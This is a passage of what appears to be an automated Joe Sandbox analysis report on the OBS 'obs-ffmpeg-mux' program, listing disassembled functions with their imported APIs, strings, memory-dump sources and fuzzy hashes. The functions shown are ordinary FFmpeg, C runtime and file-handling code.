DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C648
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C7BB
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C83B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C84A

Strings

`anonymous namespace', xrefs: 00007FF8BFB8C71B

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction ID: dde3d7a2b8de9ab356e5bc7fb4413c5e16eedcbb21dd9f617ad8e7eb71174fef
Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction Fuzzy Hash: AFE170B2A08B8695EB10DFA8E8811ED7BA0FB957C8F548035EB4D17B96DF38D554C700

Function 00007FF8A7BF6650 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7BF6890: MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BF6903
Part of subcall function 00007FF8A7BF6890: MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BF6945
Part of subcall function 00007FF8A7BF6890: GetFullPathNameW.KERNEL32 ref: 00007FF8A7BF696E
Part of subcall function 00007FF8A7BF6890: GetFullPathNameW.KERNEL32 ref: 00007FF8A7BF69A2
Part of subcall function 00007FF8A7BF6890: wcslen.MSVCRT ref: 00007FF8A7BF69C1
Part of subcall function 00007FF8A7BF6890: _wsopen.MSVCRT ref: 00007FF8A7BF69EB
Part of subcall function 00007FF8A7BF6890: _sopen.MSVCRT ref: 00007FF8A7BF6A15

_fstat64.MSVCRT ref: 00007FF8A7BF66AE
_close.MSVCRT ref: 00007FF8A7BF66D7
_get_osfhandle.MSVCRT ref: 00007FF8A7BF66F3
CreateFileMappingA.KERNEL32 ref: 00007FF8A7BF6718
MapViewOfFile.KERNEL32 ref: 00007FF8A7BF6741
CloseHandle.KERNEL32 ref: 00007FF8A7BF674D
_errno.MSVCRT ref: 00007FF8A7BF6768
_errno.MSVCRT ref: 00007FF8A7BF67B0
_close.MSVCRT ref: 00007FF8A7BF67F1

Strings

Error occurred in CreateFileMapping(), xrefs: 00007FF8A7BF6800
Cannot read file '%s': %s, xrefs: 00007FF8A7BF679A
Error occurred in MapViewOfFile(), xrefs: 00007FF8A7BF6831
Error occurred in fstat(): %s, xrefs: 00007FF8A7BF67DD

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ByteCharFileFullMultiNamePathWide_close_errno$CloseCreateHandleMappingView_fstat64_get_osfhandle_sopen_wsopenwcslen
String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in MapViewOfFile()$Error occurred in fstat(): %s
API String ID: 741575255-3109280323
Opcode ID: 7267cfeadb9c871bf9fb2dec6a57e72c4003b2fad726f8657ee3e356bb816377
Instruction ID: 6a5e8f4a62126848f1a8978f7a43266fafc0ecd4500570317bf1fd46c8396d0e
Opcode Fuzzy Hash: 7267cfeadb9c871bf9fb2dec6a57e72c4003b2fad726f8657ee3e356bb816377
Instruction Fuzzy Hash: B2418E71A0AB86A2E7559F11E4247AE62A4FF84BC8F404139EE8E07B94DF7DD406E740

Function 00007FF8BFB5B4A0 Relevance: 24.2, APIs: 16, Instructions: 234COMMON

Download Yara Rule

APIs

av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B5AA
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB5B5B6
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B606
av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B615
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB5B621
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B649

Part of subcall function 00007FF8BFB5B2B0: av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B314
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB5B34F
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B370
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B394
Part of subcall function 00007FF8BFB5B2B0: av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B3D2
Part of subcall function 00007FF8BFB5B2B0: av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B3E1
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB5B3F6
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B413
Part of subcall function 00007FF8BFB5B2B0: av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B433
Part of subcall function 00007FF8BFB5B2B0: av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B477

Part of subcall function 00007FF8BFB65F8E: av_log.AVUTIL-58 ref: 00007FF8BFB65FC9

av_frame_get_buffer.AVUTIL-58 ref: 00007FF8BFB5B706
av_get_bytes_per_sample.AVUTIL-58 ref: 00007FF8BFB5B74B
av_sample_fmt_is_planar.AVUTIL-58 ref: 00007FF8BFB5B763

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_channel_layout_from_maskav_channel_layout_uninitav_opt_set_int$av_channel_layout_compareav_opt_set_chlayout$av_frame_get_bufferav_get_bytes_per_sampleav_logav_sample_fmt_is_planar
String ID:
API String ID: 1741793059-0
Opcode ID: 5f9c736c55c51c0448996e1834cac8009cd8094c6cea8c5c45183c0897257ebe
Instruction ID: 71b595b2e284fa34c75912097706aa9c33bd1ed9d1a68dcca8679db0e8838c6e
Opcode Fuzzy Hash: 5f9c736c55c51c0448996e1834cac8009cd8094c6cea8c5c45183c0897257ebe
Instruction Fuzzy Hash: DD916E22B0824686FA699EBDA46177AB7D5BF40BC4F448431DF0A9B696EF3DF4018700

Function 00007FF8BFB8A83C Relevance: 22.9, APIs: 15, Instructions: 358COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A88D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A969
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A9B2
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A9C3

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction ID: c7c05f362f43044eb9b904760e8aada016086ddeab4c1e12e35c09589849d93a
Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction Fuzzy Hash: F0F17E76B08682AAE710DFA8D4901FC77B5EB8478CB448136EB4D67A9ADF38D519C340

Function 00007FF8BFB8D20C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 349COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8D712

Strings

nullptr, xrefs: 00007FF8BFB8D3FA
`template-type-parameter-, xrefs: 00007FF8BFB8D6D0
`generic-class-parameter-, xrefs: 00007FF8BFB8D6C7
NULL, xrefs: 00007FF8BFB8D2D7
`generic-method-parameter-, xrefs: 00007FF8BFB8D6B7

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
API String ID: 2943138195-2309034085
Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction ID: 0b22f75e484b1d7b71b28f3155ea2b8771ac3c3b6fcc9244c0b640348df37b54
Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction Fuzzy Hash: 9FE14F62E0865294FB15ABECD9951FC27A1AF897C8F544137CF0D27A9BDE3CA904C360

Function 00007FF8A7C0EA60 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 176stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7C0EAAA
strchr.MSVCRT ref: 00007FF8A7C0EAE4
strlen.MSVCRT ref: 00007FF8A7C0EB01
strtoul.MSVCRT ref: 00007FF8A7C0EB65

Strings

Invalid 0xRRGGBB[AA] color string: '%s', xrefs: 00007FF8A7C0ED09
Invalid alpha value specifier '%s' in '%s', xrefs: 00007FF8A7C0ECF0
bikeshed, xrefs: 00007FF8A7C0EB20
random, xrefs: 00007FF8A7C0EB0A
Cannot find color '%s', xrefs: 00007FF8A7C0ED2A
0123456789ABCDEFabcdef, xrefs: 00007FF8A7C0EC1C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strlen$strchrstrtoul
String ID: 0123456789ABCDEFabcdef$Cannot find color '%s'$Invalid 0xRRGGBB[AA] color string: '%s'$Invalid alpha value specifier '%s' in '%s'$bikeshed$random
API String ID: 643661298-1323625105
Opcode ID: 05b314dcd31ff43a5f327d01538bb3f4bf05cbc92719439464dceff93f7a60bd
Instruction ID: 083cc66c2802c642d29bab12fa626af39a6ab22eaa9befc3b9f5b4047231567f
Opcode Fuzzy Hash: 05b314dcd31ff43a5f327d01538bb3f4bf05cbc92719439464dceff93f7a60bd
Instruction Fuzzy Hash: E8712A12A5F682A5FB61AF21B41177D5690EF817C0F448231EE8E477C1DF6DF542A380

Function 00007FF649AA1250 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

avcodec_descriptor_get_by_name.AVCODEC-60 ref: 00007FF649AA126F
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA127F
avcodec_find_encoder.AVCODEC-60 ref: 00007FF649AA12A9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA12B9

Strings

Couldn't find codec descriptor '%s', xrefs: 00007FF649AA1288
Couldn't find codec '%s', xrefs: 00007FF649AA12C2
title, xrefs: 00007FF649AA131D

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: __acrt_iob_func$avcodec_descriptor_get_by_nameavcodec_find_encoder
String ID: Couldn't find codec '%s'$Couldn't find codec descriptor '%s'$title
API String ID: 3715327632-3279048111
Opcode ID: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
Instruction ID: c77091452084ef3f0222a1e37f6b4bd4e138972573eb54c46a77caa1f83247cf
Opcode Fuzzy Hash: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
Instruction Fuzzy Hash: 69617972609B8197DB04EF16E5907AD77A0FB88B98F05403ADE4E877A4DF38E0A5C714

Function 00007FF8A7C23CB0 Relevance: 21.1, APIs: 14, Instructions: 123COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7C23D1B
_aligned_free.MSVCRT ref: 00007FF8A7C23D23

Part of subcall function 00007FF8A7C23CB0: _aligned_free.MSVCRT ref: 00007FF8A7C23CF9

_aligned_free.MSVCRT ref: 00007FF8A7C23D4D
_aligned_free.MSVCRT ref: 00007FF8A7C23D6F
_aligned_free.MSVCRT ref: 00007FF8A7C23D77
_aligned_free.MSVCRT ref: 00007FF8A7C23D7F
_aligned_free.MSVCRT ref: 00007FF8A7C23DB7
_aligned_free.MSVCRT ref: 00007FF8A7C23DD9
_aligned_free.MSVCRT ref: 00007FF8A7C23DE1
_aligned_free.MSVCRT ref: 00007FF8A7C23E0B
_aligned_free.MSVCRT ref: 00007FF8A7C23E2D
_aligned_free.MSVCRT ref: 00007FF8A7C23E35
_aligned_free.MSVCRT ref: 00007FF8A7C23E3D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: 9507d53f166a1d0254cdadf622783abd4b684d210657e614246861b7e6ebef3c
Instruction ID: 4d46bd68ab77913e26dc236bc9e6d6741dc95cbabd142b08364e75dca3c94fe5
Opcode Fuzzy Hash: 9507d53f166a1d0254cdadf622783abd4b684d210657e614246861b7e6ebef3c
Instruction Fuzzy Hash: 1741D311B1A462A0EB4AFE12C45A57E2759FF85FD0B468935DE1D4B392CF3CE846A3C0

Function 00007FF8BFB82CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF8BFB82D40

Part of subcall function 00007FF8BFB85010: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF8BFB85045
Part of subcall function 00007FF8BFB85010: __GetUnwindTryBlock.LIBCMT ref: 00007FF8BFB85053
Part of subcall function 00007FF8BFB85010: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF8BFB85078

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8BFB82E18
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB82E25
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF8BFB83060
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8308E
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF8BFB830CC

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB83154
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8BFB83189

Strings

csm, xrefs: 00007FF8BFB82E3D
csm, xrefs: 00007FF8BFB82D5A
csm, xrefs: 00007FF8BFB82DC1

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3436797354-393685449
Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction ID: 86a37aeaf06eb04e483cf3f8d3469abdb3fc568c131735268a09658bf7ad04cb
Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction Fuzzy Hash: 2BD16036A087418AEB609FA9D4802AD7BA1FB85BD8F144135EF8D57B5ADF38E494C700

Function 00007FF8BFB57400 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

av_calloc.AVUTIL-58 ref: 00007FF8BFB57470
memcpy.MSVCRT ref: 00007FF8BFB574F2
memcpy.MSVCRT ref: 00007FF8BFB5751E
av_freep.AVUTIL-58(?,?), ref: 00007FF8BFB575A9

Strings

src/libswresample/resample.c, xrefs: 00007FF8BFB5760B
!c->frac && !c->dst_incr_mod, xrefs: 00007FF8BFB57612
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB57622

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy$av_callocav_freep
String ID: !c->frac && !c->dst_incr_mod$Assertion %s failed at %s:%d$src/libswresample/resample.c
API String ID: 1182148616-608564573
Opcode ID: ae225f1ac773ac5f9c1fe2fea1a141108402761e9a2d6cdf13e09e92a9034940
Instruction ID: 9cd4781f33bf87c42924a952460eea35e35c2782d53753ebc21ca507654105f6
Opcode Fuzzy Hash: ae225f1ac773ac5f9c1fe2fea1a141108402761e9a2d6cdf13e09e92a9034940
Instruction Fuzzy Hash: BC6172B2A087068BD758CF7DD59157DB7A5EB44B98B204136EB0D87798DB3CE441CB80

Function 00007FF8A7BEAE10 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 151stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BEAE26
memcmp.MSVCRT ref: 00007FF8A7BEAEA5

Strings

mono, xrefs: 00007FF8A7BEAE70

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcmpstrlen
String ID: mono
API String ID: 3108337309-2381334079
Opcode ID: 4442f9bb683f4af6272261eaf8af414874aa53633c76ffc30400c404e096c1e0
Instruction ID: 1cdbd9caa3b1d4b4491da20a2d7a985642ee08bcb28862614b34f96c67b0080d
Opcode Fuzzy Hash: 4442f9bb683f4af6272261eaf8af414874aa53633c76ffc30400c404e096c1e0
Instruction Fuzzy Hash: 7F51A0B2B0B542A6FF619F1594512BE6695EF05BC0F8D4432DE0E57780EE2CE446A340

Function 00007FF8BFB58F70 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

av_freep.AVUTIL-58 ref: 00007FF8BFB5909C
av_log.AVUTIL-58 ref: 00007FF8BFB59187
abort.MSVCRT ref: 00007FF8BFB5918C
av_log.AVUTIL-58 ref: 00007FF8BFB591B5
abort.MSVCRT ref: 00007FF8BFB591BA

Strings

Assertion %s failed at %s:%d, xrefs: 00007FF8BFB59178, 00007FF8BFB591AE
a->bps, xrefs: 00007FF8BFB59198
a->ch_count, xrefs: 00007FF8BFB59168
src/libswresample/swresample.c, xrefs: 00007FF8BFB59161, 00007FF8BFB59191

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortav_log$av_freep
String ID: Assertion %s failed at %s:%d$a->bps$a->ch_count$src/libswresample/swresample.c
API String ID: 2329147549-2798989596
Opcode ID: 8a6bc04a2563c4ca64b9d2f166cec7721cca9d96160b8b29e1ad9d54915bbd6c
Instruction ID: 3912c6949bd3892ae2d3b167be24ca124e2f635c2228e23530c43ed2c7041db4
Opcode Fuzzy Hash: 8a6bc04a2563c4ca64b9d2f166cec7721cca9d96160b8b29e1ad9d54915bbd6c
Instruction Fuzzy Hash: 91510072B0968295EB308FADA898BF97360EF547C8F044235DF1D4AA95DF3CE505C600

Function 00007FF8A7BEF360 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7C078F0: strlen.MSVCRT ref: 00007FF8A7C078FF
Part of subcall function 00007FF8A7C078F0: _aligned_realloc.MSVCRT ref: 00007FF8A7C0791F
Part of subcall function 00007FF8A7C078F0: memcpy.MSVCRT ref: 00007FF8A7C07936

_aligned_free.MSVCRT ref: 00007FF8A7BEF410
_aligned_free.MSVCRT ref: 00007FF8A7BEF418
_aligned_free.MSVCRT ref: 00007FF8A7BEF49B
_aligned_free.MSVCRT ref: 00007FF8A7BEF4A5
_aligned_free.MSVCRT ref: 00007FF8A7BEF51E
_aligned_free.MSVCRT ref: 00007FF8A7BEF528
strlen.MSVCRT ref: 00007FF8A7BEF5C0
strlen.MSVCRT ref: 00007FF8A7BEF5CB
memcpy.MSVCRT ref: 00007FF8A7BEF5F9

Strings

%lld, xrefs: 00007FF8A7BEF386

